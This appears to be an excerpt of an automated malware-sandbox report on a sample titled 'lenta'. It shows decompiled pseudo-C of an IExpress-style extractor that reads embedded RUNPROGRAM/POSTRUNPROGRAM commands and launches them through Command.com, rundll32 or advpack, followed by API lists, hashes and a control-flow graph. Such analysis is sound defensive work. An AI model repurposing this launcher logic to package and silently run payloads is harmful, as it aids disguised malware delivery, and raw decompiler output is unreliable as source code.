                              											_t77 = 0;
                              											L63:
                              											_pop(_t150);
                              											_pop(_t156);
                              											_pop(_t128);
                              											return E010E6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                              										}
                              										_t157 = _v404;
                              										__eflags = _t149;
                              										if(_t149 != 0) {
                              											L37:
                              											__eflags = _t157;
                              											if(_t157 == 0) {
                              												L57:
                              												_t151 = _v408;
                              												_t146 =  &_v352;
                              												_t130 = _t151; // executed
                              												_t79 = E010E3FEF(_t130,  &_v352); // executed
                              												__eflags = _t79;
                              												if(_t79 == 0) {
                              													L61:
                              													LocalFree(_t151);
                              													goto L62;
                              												}
                              												L58:
                              												LocalFree(_t151);
                              												_t127 = _t127 + 1;
                              												_v396 = _t127;
                              												__eflags = _t127 - 2;
                              												if(_t127 >= 2) {
                              													_t155 = 1;
                              													__eflags = 1;
                              													L69:
                              													__eflags =  *0x10e8580;
                              													if( *0x10e8580 != 0) {
                              														E010E2267();
                              													}
                              													_t77 = _t155;
                              													goto L63;
                              												}
                              												_t153 = _v392;
                              												_t149 = _v388;
                              												continue;
                              											}
                              											L38:
                              											__eflags =  *0x10e8180;
                              											if( *0x10e8180 == 0) {
                              												_t146 = 0x4c7;
                              												E010E44B9(0, 0x4c7, 0, 0, 0x10, 0);
                              												LocalFree(_v424);
                              												 *0x10e9124 = 0x8007042b;
                              												goto L62;
                              											}
                              											__eflags = _t157;
                              											if(_t157 == 0) {
                              												goto L57;
                              											}
                              											__eflags =  *0x10e9a34 & 0x00000004;
                              											if(__eflags == 0) {
                              												goto L57;
                              											}
                              											_t129 = E010E6495(_t127, _t132, _t157, __eflags);
                              											__eflags = _t129;
                              											if(_t129 == 0) {
                              												_t146 = 0x4c8;
                              												E010E44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                              												L65:
                              												LocalFree(_v408);
                              												 *0x10e9124 = E010E6285();
                              												goto L62;
                              											}
                              											_t146 = GetProcAddress(_t129, "DoInfInstall");
                              											_v404 = _t146;
                              											__eflags = _t146;
                              											if(_t146 == 0) {
                              												_t146 = 0x4c9;
                              												__eflags = 0;
                              												E010E44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                              												FreeLibrary(_t129);
                              												goto L65;
                              											}
                              											__eflags =  *0x10e8a30;
                              											_t151 = _v408;
                              											_v384 = 0;
                              											_v368 =  &_v280;
                              											_t96 =  *0x10e9a40; // 0x3
                              											_v364 = _t96;
                              											_t97 =  *0x10e8a38 & 0x0000ffff;
                              											_v380 = 0x10e9154;
                              											_v376 = _t151;
                              											_v372 = 0x10e91e4;
                              											_v360 = _t97;
                              											if( *0x10e8a30 != 0) {
                              												_t97 = _t97 | 0x00010000;
                              												__eflags = _t97;
                              												_v360 = _t97;
                              											}
                              											_t144 =  *0x10e9a34; // 0x1
                              											__eflags = _t144 & 0x00000008;
                              											if((_t144 & 0x00000008) != 0) {
                              												_t97 = _t97 | 0x00020000;
                              												__eflags = _t97;
                              												_v360 = _t97;
                              											}
                              											__eflags = _t144 & 0x00000010;
                              											if((_t144 & 0x00000010) != 0) {
                              												_t97 = _t97 | 0x00040000;
                              												__eflags = _t97;
                              												_v360 = _t97;
                              											}
                              											_t145 =  *0x10e8d48; // 0x0
                              											__eflags = _t145 & 0x00000040;
                              											if((_t145 & 0x00000040) != 0) {
                              												_t97 = _t97 | 0x00080000;
                              												__eflags = _t97;
                              												_v360 = _t97;
                              											}
                              											__eflags = _t145;
                              											if(_t145 < 0) {
                              												_t104 = _t97 | 0x00100000;
                              												__eflags = _t104;
                              												_v360 = _t104;
                              											}
                              											_t98 =  *0x10e9a38; // 0x0
                              											_v356 = _t98;
                              											_t130 = _t146;
                              											 *0x10ea288( &_v384);
                              											_t101 = _v404();
                              											__eflags = _t164 - _t164;
                              											if(_t164 != _t164) {
                              												_t130 = 4;
                              												asm("int 0x29");
                              											}
                              											 *0x10e9124 = _t101;
                              											_push(_t129);
                              											__eflags = _t101;
                              											if(_t101 < 0) {
                              												FreeLibrary();
                              												goto L61;
                              											} else {
                              												FreeLibrary();
                              												_t127 = _v400;
                              												goto L58;
                              											}
                              										}
                              										__eflags =  *0x10e9a40 - 1; // 0x3
                              										if(__eflags == 0) {
                              											goto L37;
                              										}
                              										__eflags =  *0x10e8a20;
                              										if( *0x10e8a20 == 0) {
                              											goto L37;
                              										}
                              										__eflags = _t157;
                              										if(_t157 != 0) {
                              											goto L38;
                              										}
                              										_v388 = 1;
                              										E010E202A(_t146); // executed
                              										goto L37;
                              									}
                              									_t146 =  &_v280;
                              									_t108 = E010E468F("POSTRUNPROGRAM",  &_v280, 0x104);
                              									__eflags = _t108;
                              									if(_t108 == 0) {
                              										goto L25;
                              									}
                              									__eflags =  *0x10e8c42;
                              									if( *0x10e8c42 != 0) {
                              										goto L69;
                              									}
                              									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                              									__eflags = _t112 == 0;
                              									if(_t112 == 0) {
                              										goto L69;
                              									}
                              									goto L31;
                              								}
                              								_t118 =  *0x10e8a38; // 0x0
                              								if(_t118 == 0) {
                              									L23:
                              									if(_t153 != 0) {
                              										goto L31;
                              									}
                              									_t146 =  &_v276;
                              									if(E010E468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                              										goto L27;
                              									}
                              									goto L25;
                              								}
                              								if((_t118 & 0x00000001) == 0) {
                              									__eflags = _t118 & 0x00000002;
                              									if((_t118 & 0x00000002) == 0) {
                              										goto L62;
                              									}
                              									_t140 = "USRQCMD";
                              									L20:
                              									_t146 =  &_v276;
                              									if(E010E468F(_t140,  &_v276, 0x104) == 0) {
                              										goto L25;
                              									}
                              									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                              										_t153 = 1;
                              										_v388 = 1;
                              									}
                              									goto L23;
                              								}
                              								_t140 = "ADMQCMD";
                              								goto L20;
                              							}
                              						}
                              						L26:
                              						_push(_t130);
                              						_t146 = 0x104;
                              						E010E1781( &_v276, 0x104, _t130, 0x10e8c42);
                              						goto L27;
                              					}
                              				}
                              				_t130 = "REBOOT";
                              				_t125 = E010E468F(_t130, 0x10e9a2c, 4);
                              				if(_t125 == 0 || _t125 > 4) {
                              					goto L25;
                              				} else {
                              					goto L3;
                              				}
                              			}





























































                              0x010e3baa
                              0x010e3bb0
                              0x010e3bb7
                              0x010e3bc0
                              0x010e3bc2
                              0x010e3bc9
                              0x010e3bcb
                              0x010e3bcf
                              0x010e3bd3
                              0x010e3bd9
                              0x010e3bfd
                              0x010e3bfd
                              0x010e3bff
                              0x010e3c03
                              0x010e3c03
                              0x010e3c11
                              0x010e3c16
                              0x010e3c19
                              0x010e3c28
                              0x00000000
                              0x00000000
                              0x010e3c30
                              0x010e3c39
                              0x010e3c40
                              0x010e3d13
                              0x010e3d15
                              0x010e3d21
                              0x010e3d26
                              0x00000000
                              0x010e3c4f
                              0x010e3c56
                              0x010e3c60
                              0x010e3c65
                              0x010e3c77
                              0x010e3c78
                              0x010e3c7c
                              0x010e3c7e
                              0x010e3c82
                              0x010e3c82
                              0x00000000
                              0x010e3c7c
                              0x010e3c67
                              0x010e3c69
                              0x010e3c6d
                              0x00000000
                              0x010e3c58
                              0x010e3c58
                              0x010e3c6e
                              0x010e3c6e
                              0x010e3c87
                              0x010e3c89
                              0x010e3d4d
                              0x010e3d4f
                              0x010e3d50
                              0x010e3d52
                              0x010e3d9e
                              0x010e3da8
                              0x010e3daf
                              0x010e3db4
                              0x010e3db6
                              0x010e3f4d
                              0x010e3f4d
                              0x010e3f4f
                              0x010e3f56
                              0x010e3f57
                              0x010e3f58
                              0x010e3f63
                              0x010e3f63
                              0x010e3dbc
                              0x010e3dc0
                              0x010e3dc2
                              0x010e3de6
                              0x010e3de6
                              0x010e3de8
                              0x010e3f0b
                              0x010e3f0b
                              0x010e3f0f
                              0x010e3f13
                              0x010e3f15
                              0x010e3f1a
                              0x010e3f1c
                              0x010e3f46
                              0x010e3f47
                              0x00000000
                              0x010e3f47
                              0x010e3f1e
                              0x010e3f1f
                              0x010e3f25
                              0x010e3f26
                              0x010e3f2a
                              0x010e3f2d
                              0x010e3fd9
                              0x010e3fd9
                              0x010e3fda
                              0x010e3fda
                              0x010e3fe1
                              0x010e3fe3
                              0x010e3fe3
                              0x010e3fe8
                              0x00000000
                              0x010e3fe8
                              0x010e3f33
                              0x010e3f37
                              0x00000000
                              0x010e3f37
                              0x010e3dee
                              0x010e3dee
                              0x010e3df5
                              0x010e3fad
                              0x010e3fb9
                              0x010e3fc2
                              0x010e3fc8
                              0x00000000
                              0x010e3fc8
                              0x010e3dfb
                              0x010e3dfd
                              0x00000000
                              0x00000000
                              0x010e3e03
                              0x010e3e0a
                              0x00000000
                              0x00000000
                              0x010e3e15
                              0x010e3e17
                              0x010e3e19
                              0x010e3f94
                              0x010e3fa4
                              0x010e3f7c
                              0x010e3f80
                              0x010e3f8b
                              0x00000000
                              0x010e3f8b
                              0x010e3e2c
                              0x010e3e30
                              0x010e3e34
                              0x010e3e36
                              0x010e3f69
                              0x010e3f6e
                              0x010e3f70
                              0x010e3f76
                              0x00000000
                              0x010e3f76
                              0x010e3e3c
                              0x010e3e43
                              0x010e3e47
                              0x010e3e52
                              0x010e3e56
                              0x010e3e5c
                              0x010e3e61
                              0x010e3e68
                              0x010e3e70
                              0x010e3e74
                              0x010e3e7c
                              0x010e3e80
                              0x010e3e82
                              0x010e3e82
                              0x010e3e87
                              0x010e3e87
                              0x010e3e8b
                              0x010e3e91
                              0x010e3e94
                              0x010e3e96
                              0x010e3e96
                              0x010e3e9b
                              0x010e3e9b
                              0x010e3e9f
                              0x010e3ea2
                              0x010e3ea4
                              0x010e3ea4
                              0x010e3ea9
                              0x010e3ea9
                              0x010e3ead
                              0x010e3eb3
                              0x010e3eb6
                              0x010e3eb8
                              0x010e3eb8
                              0x010e3ebd
                              0x010e3ebd
                              0x010e3ec1
                              0x010e3ec3
                              0x010e3ec5
                              0x010e3ec5
                              0x010e3eca
                              0x010e3eca
                              0x010e3ece
                              0x010e3ed5
                              0x010e3ed9
                              0x010e3ee0
                              0x010e3ee6
                              0x010e3eea
                              0x010e3eec
                              0x010e3eee
                              0x010e3ef3
                              0x010e3ef3
                              0x010e3ef5
                              0x010e3efa
                              0x010e3efb
                              0x010e3efd
                              0x010e3f40
                              0x00000000
                              0x010e3eff
                              0x010e3eff
                              0x010e3f05
                              0x00000000
                              0x010e3f05
                              0x010e3efd
                              0x010e3dc7
                              0x010e3dce
                              0x00000000
                              0x00000000
                              0x010e3dd0
                              0x010e3dd7
                              0x00000000
                              0x00000000
                              0x010e3dd9
                              0x010e3ddb
                              0x00000000
                              0x00000000
                              0x010e3ddd
                              0x010e3de1
                              0x00000000
                              0x010e3de1
                              0x010e3d59
                              0x010e3d65
                              0x010e3d6a
                              0x010e3d6c
                              0x00000000
                              0x00000000
                              0x010e3d6e
                              0x010e3d75
                              0x00000000
                              0x00000000
                              0x010e3d8f
                              0x010e3d96
                              0x010e3d98
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e3d98
                              0x010e3c8f
                              0x010e3c98
                              0x010e3cf1
                              0x010e3cf3
                              0x00000000
                              0x00000000
                              0x010e3cfe
                              0x010e3d11
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e3d11
                              0x010e3c9c
                              0x010e3ca5
                              0x010e3ca7
                              0x00000000
                              0x00000000
                              0x010e3cad
                              0x010e3cb2
                              0x010e3cb7
                              0x010e3cc5
                              0x00000000
                              0x00000000
                              0x010e3ce8
                              0x010e3cec
                              0x010e3ced
                              0x010e3ced
                              0x00000000
                              0x010e3ce8
                              0x010e3c9e
                              0x00000000
                              0x010e3c9e
                              0x010e3c56
                              0x010e3d35
                              0x010e3d35
                              0x010e3d3c
                              0x010e3d48
                              0x00000000
                              0x010e3d48
                              0x010e3c03
                              0x010e3be2
                              0x010e3be7
                              0x010e3bee
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000

                              APIs
                              • memset.MSVCRT ref: 010E3C11
                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 010E3CDC
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,010E8C42), ref: 010E3D8F
                              • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 010E3E26
                              • FreeLibrary.KERNEL32(00000000,?,010E8C42), ref: 010E3EFF
                              • LocalFree.KERNEL32(?,?,?,?,010E8C42), ref: 010E3F1F
                              • FreeLibrary.KERNEL32(00000000,?,010E8C42), ref: 010E3F40
                              • LocalFree.KERNEL32(?,?,?,?,010E8C42), ref: 010E3F47
                              • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,010E8C42), ref: 010E3F76
                              • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,010E8C42), ref: 010E3F80
                              • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,010E8C42), ref: 010E3FC2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                              • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                              • API String ID: 1032054927-3356413666
                              • Opcode ID: 676eed3d1fdf1577cdb906ee83409c9c7c81767f6203eaa81ecec233e79721fd
                              • Instruction ID: 00bddd72e0a924ccb5e346a19bdea5302e212816f56494443a6ffa80cb0c6865
                              • Opcode Fuzzy Hash: 676eed3d1fdf1577cdb906ee83409c9c7c81767f6203eaa81ecec233e79721fd
                              • Instruction Fuzzy Hash: FFB19E706083019FE7749F2B9849B6A7EE4BB88B14F00496DFAD5DB290D776C8448B92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 141 10e1ae8-10e1b2c call 10e1680 144 10e1b2e-10e1b39 141->144 145 10e1b3b-10e1b40 141->145 146 10e1b46-10e1b61 call 10e1a84 144->146 145->146 149 10e1b9f-10e1bc2 call 10e1781 call 10e658a 146->149 150 10e1b63-10e1b65 146->150 157 10e1bc7-10e1bd3 call 10e66c8 149->157 151 10e1b68-10e1b6d 150->151 151->151 153 10e1b6f-10e1b74 151->153 153->149 155 10e1b76-10e1b7b 153->155 158 10e1b7d-10e1b81 155->158 159 10e1b83-10e1b86 155->159 165 10e1bd9-10e1bf1 CompareStringA 157->165 166 10e1d73-10e1d7f call 10e66c8 157->166 158->159 161 10e1b8c-10e1b9d call 10e1680 158->161 159->149 162 10e1b88-10e1b8a 159->162 161->157 162->149 162->161 165->166 168 10e1bf7-10e1c07 GetFileAttributesA 165->168 175 10e1df8-10e1e09 LocalAlloc 166->175 176 10e1d81-10e1d99 CompareStringA 166->176 170 10e1c0d-10e1c15 168->170 171 10e1d53-10e1d5e 168->171 170->171 174 10e1c1b-10e1c33 call 10e1a84 170->174 173 10e1d64-10e1d6e call 10e44b9 171->173 187 10e1e94-10e1ea4 call 10e6ce0 173->187 189 10e1c35-10e1c38 174->189 190 10e1c50-10e1c61 LocalAlloc 174->190 178 10e1e0b-10e1e1b GetFileAttributesA 175->178 179 10e1dd4-10e1ddf 175->179 176->175 181 10e1d9b-10e1da2 176->181 183 10e1e1d-10e1e1f 178->183 184 10e1e67-10e1e73 call 10e1680 178->184 179->173 186 10e1da5-10e1daa 181->186 183->184 188 10e1e21-10e1e3e call 10e1781 183->188 199 10e1e78-10e1e84 call 10e2aac 184->199 186->186 191 10e1dac-10e1db4 186->191 188->199 210 10e1e40-10e1e43 188->210 195 10e1c3a 189->195 196 10e1c40-10e1c4b call 10e1a84 189->196 190->179 198 10e1c67-10e1c72 190->198 197 10e1db7-10e1dbc 191->197 195->196 196->190 197->197 204 10e1dbe-10e1dd2 LocalAlloc 197->204 205 10e1c79-10e1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->205 206 10e1c74 198->206 207 10e1e89-10e1e92 199->207 204->179 211 10e1de1-10e1df3 call 10e171e 204->211 208 10e1cf8-10e1d07 205->208 209 10e1cc2-10e1ccc 205->209 206->205 207->187 215 10e1d09-10e1d21 GetShortPathNameA 208->215 216 10e1d23 208->216 212 10e1cce 209->212 213 10e1cd3-10e1cf3 call 10e1680 * 2 209->213 210->199 214 10e1e45-10e1e65 call 10e16b3 * 2 210->214 211->207 212->213 213->207 214->199 221 10e1d28-10e1d2b 215->221 216->221 224 10e1d2d 221->224 225 10e1d32-10e1d4e call 10e171e 221->225 224->225 225->207
                              C-Code - Quality: 82%
                              			E010E1AE8(long __ecx, CHAR** _a4, int* _a8) {
                              				signed int _v8;
                              				char _v268;
                              				char _v527;
                              				char _v528;
                              				char _v1552;
                              				CHAR* _v1556;
                              				int* _v1560;
                              				CHAR** _v1564;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t48;
                              				CHAR* _t53;
                              				CHAR* _t54;
                              				char* _t57;
                              				char* _t58;
                              				CHAR* _t60;
                              				void* _t62;
                              				signed char _t65;
                              				intOrPtr _t76;
                              				intOrPtr _t77;
                              				unsigned int _t85;
                              				CHAR* _t90;
                              				CHAR* _t92;
                              				char _t105;
                              				char _t106;
                              				CHAR** _t111;
                              				CHAR* _t115;
                              				intOrPtr* _t125;
                              				void* _t126;
                              				CHAR* _t132;
                              				CHAR* _t135;
                              				void* _t138;
                              				void* _t139;
                              				void* _t145;
                              				intOrPtr* _t146;
                              				char* _t148;
                              				CHAR* _t151;
                              				void* _t152;
                              				CHAR* _t155;
                              				CHAR* _t156;
                              				void* _t157;
                              				signed int _t158;
                              
                              				_t48 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t48 ^ _t158;
                              				_t108 = __ecx;
                              				_v1564 = _a4;
                              				_v1560 = _a8;
                              				E010E1680( &_v528, 0x104, __ecx);
                              				if(_v528 != 0x22) {
                              					_t135 = " ";
                              					_t53 =  &_v528;
                              				} else {
                              					_t135 = "\"";
                              					_t53 =  &_v527;
                              				}
                              				_t111 =  &_v1556;
                              				_v1556 = _t53;
                              				_t54 = E010E1A84(_t111, _t135);
                              				_t156 = _v1556;
                              				_t151 = _t54;
                              				if(_t156 == 0) {
                              					L12:
                              					_push(_t111);
                              					E010E1781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                              					E010E658A( &_v268, 0x104, _t156);
                              					goto L13;
                              				} else {
                              					_t132 = _t156;
                              					_t148 =  &(_t132[1]);
                              					do {
                              						_t105 =  *_t132;
                              						_t132 =  &(_t132[1]);
                              					} while (_t105 != 0);
                              					_t111 = _t132 - _t148;
                              					if(_t111 < 3) {
                              						goto L12;
                              					}
                              					_t106 = _t156[1];
                              					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                              						if( *_t156 != 0x5c || _t106 != 0x5c) {
                              							goto L12;
                              						} else {
                              							goto L11;
                              						}
                              					} else {
                              						L11:
                              						E010E1680( &_v268, 0x104, _t156);
                              						L13:
                              						_t138 = 0x2e;
                              						_t57 = E010E66C8(_t156, _t138);
                              						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                              							_t139 = 0x2e;
                              							_t115 = _t156;
                              							_t58 = E010E66C8(_t115, _t139);
                              							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                              								_t156 = LocalAlloc(0x40, 0x400);
                              								if(_t156 == 0) {
                              									goto L43;
                              								}
                              								_t65 = GetFileAttributesA( &_v268); // executed
                              								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                              									E010E1680( &_v1552, 0x400, _t108);
                              								} else {
                              									_push(_t115);
                              									_t108 = 0x400;
                              									E010E1781( &_v1552, 0x400, _t115,  &_v268);
                              									if(_t151 != 0 &&  *_t151 != 0) {
                              										E010E16B3( &_v1552, 0x400, " ");
                              										E010E16B3( &_v1552, 0x400, _t151);
                              									}
                              								}
                              								_t140 = _t156;
                              								 *_t156 = 0;
                              								E010E2AAC( &_v1552, _t156, _t156);
                              								goto L53;
                              							} else {
                              								_t108 = "Command.com /c %s";
                              								_t125 = "Command.com /c %s";
                              								_t145 = _t125 + 1;
                              								do {
                              									_t76 =  *_t125;
                              									_t125 = _t125 + 1;
                              								} while (_t76 != 0);
                              								_t126 = _t125 - _t145;
                              								_t146 =  &_v268;
                              								_t157 = _t146 + 1;
                              								do {
                              									_t77 =  *_t146;
                              									_t146 = _t146 + 1;
                              								} while (_t77 != 0);
                              								_t140 = _t146 - _t157;
                              								_t154 = _t126 + 8 + _t146 - _t157;
                              								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                              								if(_t156 != 0) {
                              									E010E171E(_t156, _t154, "Command.com /c %s",  &_v268);
                              									goto L53;
                              								}
                              								goto L43;
                              							}
                              						} else {
                              							_t85 = GetFileAttributesA( &_v268);
                              							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                              								_t140 = 0x525;
                              								_push(0);
                              								_push(0x10);
                              								_push(0);
                              								_t60 =  &_v268;
                              								goto L35;
                              							} else {
                              								_t140 = "[";
                              								_v1556 = _t151;
                              								_t90 = E010E1A84( &_v1556, "[");
                              								if(_t90 != 0) {
                              									if( *_t90 != 0) {
                              										_v1556 = _t90;
                              									}
                              									_t140 = "]";
                              									E010E1A84( &_v1556, "]");
                              								}
                              								_t156 = LocalAlloc(0x40, 0x200);
                              								if(_t156 == 0) {
                              									L43:
                              									_t60 = 0;
                              									_t140 = 0x4b5;
                              									_push(0);
                              									_push(0x10);
                              									_push(0);
                              									L35:
                              									_push(_t60);
                              									E010E44B9(0, _t140);
                              									_t62 = 0;
                              									goto L54;
                              								} else {
                              									_t155 = _v1556;
                              									_t92 = _t155;
                              									if( *_t155 == 0) {
                              										_t92 = "DefaultInstall";
                              									}
                              									 *0x10e9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                              									 *_v1560 = 1;
                              									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x10e1140, _t156, 8,  &_v268) == 0) {
                              										 *0x10e9a34 =  *0x10e9a34 & 0xfffffffb;
                              										if( *0x10e9a40 != 0) {
                              											_t108 = "setupapi.dll";
                              										} else {
                              											_t108 = "setupx.dll";
                              											GetShortPathNameA( &_v268,  &_v268, 0x104);
                              										}
                              										if( *_t155 == 0) {
                              											_t155 = "DefaultInstall";
                              										}
                              										_push( &_v268);
                              										_push(_t155);
                              										E010E171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                              									} else {
                              										 *0x10e9a34 =  *0x10e9a34 | 0x00000004;
                              										if( *_t155 == 0) {
                              											_t155 = "DefaultInstall";
                              										}
                              										E010E1680(_t108, 0x104, _t155);
                              										_t140 = 0x200;
                              										E010E1680(_t156, 0x200,  &_v268);
                              									}
                              									L53:
                              									_t62 = 1;
                              									 *_v1564 = _t156;
                              									L54:
                              									_pop(_t152);
                              									return E010E6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                              								}
                              							}
                              						}
                              					}
                              				}
                              			}














































                              0x010e1af3
                              0x010e1afa
                              0x010e1b07
                              0x010e1b09
                              0x010e1b1a
                              0x010e1b20
                              0x010e1b2c
                              0x010e1b3b
                              0x010e1b40
                              0x010e1b2e
                              0x010e1b2e
                              0x010e1b33
                              0x010e1b33
                              0x010e1b46
                              0x010e1b4c
                              0x010e1b52
                              0x010e1b57
                              0x010e1b5d
                              0x010e1b61
                              0x010e1b9f
                              0x010e1b9f
                              0x010e1bb1
                              0x010e1bc2
                              0x00000000
                              0x010e1b63
                              0x010e1b63
                              0x010e1b65
                              0x010e1b68
                              0x010e1b68
                              0x010e1b6a
                              0x010e1b6b
                              0x010e1b6f
                              0x010e1b74
                              0x00000000
                              0x00000000
                              0x010e1b76
                              0x010e1b7b
                              0x010e1b86
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e1b8c
                              0x010e1b8c
                              0x010e1b98
                              0x010e1bc7
                              0x010e1bc9
                              0x010e1bcc
                              0x010e1bd3
                              0x010e1d75
                              0x010e1d76
                              0x010e1d78
                              0x010e1d7f
                              0x010e1e05
                              0x010e1e09
                              0x00000000
                              0x00000000
                              0x010e1e12
                              0x010e1e1b
                              0x010e1e73
                              0x010e1e21
                              0x010e1e21
                              0x010e1e28
                              0x010e1e37
                              0x010e1e3e
                              0x010e1e52
                              0x010e1e60
                              0x010e1e60
                              0x010e1e3e
                              0x010e1e79
                              0x010e1e7b
                              0x010e1e84
                              0x00000000
                              0x010e1d9b
                              0x010e1d9b
                              0x010e1da0
                              0x010e1da2
                              0x010e1da5
                              0x010e1da5
                              0x010e1da7
                              0x010e1da8
                              0x010e1dac
                              0x010e1dae
                              0x010e1db4
                              0x010e1db7
                              0x010e1db7
                              0x010e1db9
                              0x010e1dba
                              0x010e1dbe
                              0x010e1dc3
                              0x010e1dce
                              0x010e1dd2
                              0x010e1deb
                              0x00000000
                              0x010e1df0
                              0x00000000
                              0x010e1dd2
                              0x010e1bf7
                              0x010e1bfe
                              0x010e1c07
                              0x010e1d55
                              0x010e1d5a
                              0x010e1d5b
                              0x010e1d5d
                              0x010e1d5e
                              0x00000000
                              0x010e1c1b
                              0x010e1c1b
                              0x010e1c20
                              0x010e1c2c
                              0x010e1c33
                              0x010e1c38
                              0x010e1c3a
                              0x010e1c3a
                              0x010e1c40
                              0x010e1c4b
                              0x010e1c4b
                              0x010e1c5d
                              0x010e1c61
                              0x010e1dd4
                              0x010e1dd4
                              0x010e1dd6
                              0x010e1ddb
                              0x010e1ddc
                              0x010e1dde
                              0x010e1d64
                              0x010e1d64
                              0x010e1d67
                              0x010e1d6c
                              0x00000000
                              0x010e1c67
                              0x010e1c67
                              0x010e1c6d
                              0x010e1c72
                              0x010e1c74
                              0x010e1c74
                              0x010e1c8e
                              0x010e1c99
                              0x010e1cc0
                              0x010e1cf8
                              0x010e1d07
                              0x010e1d23
                              0x010e1d09
                              0x010e1d14
                              0x010e1d1b
                              0x010e1d1b
                              0x010e1d2b
                              0x010e1d2d
                              0x010e1d2d
                              0x010e1d38
                              0x010e1d39
                              0x010e1d46
                              0x010e1cc2
                              0x010e1cc2
                              0x010e1ccc
                              0x010e1cce
                              0x010e1cce
                              0x010e1cdb
                              0x010e1ce6
                              0x010e1cee
                              0x010e1cee
                              0x010e1e89
                              0x010e1e91
                              0x010e1e92
                              0x010e1e94
                              0x010e1e97
                              0x010e1ea4
                              0x010e1ea4
                              0x010e1c61
                              0x010e1c07
                              0x010e1bd3
                              0x010e1b7b

                              APIs
                              • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 010E1BE7
                              • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 010E1BFE
                              • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 010E1C57
                              • GetPrivateProfileIntA.KERNEL32 ref: 010E1C88
                              • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,010E1140,00000000,00000008,?), ref: 010E1CB8
                              • GetShortPathNameA.KERNEL32 ref: 010E1D1B
                                • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
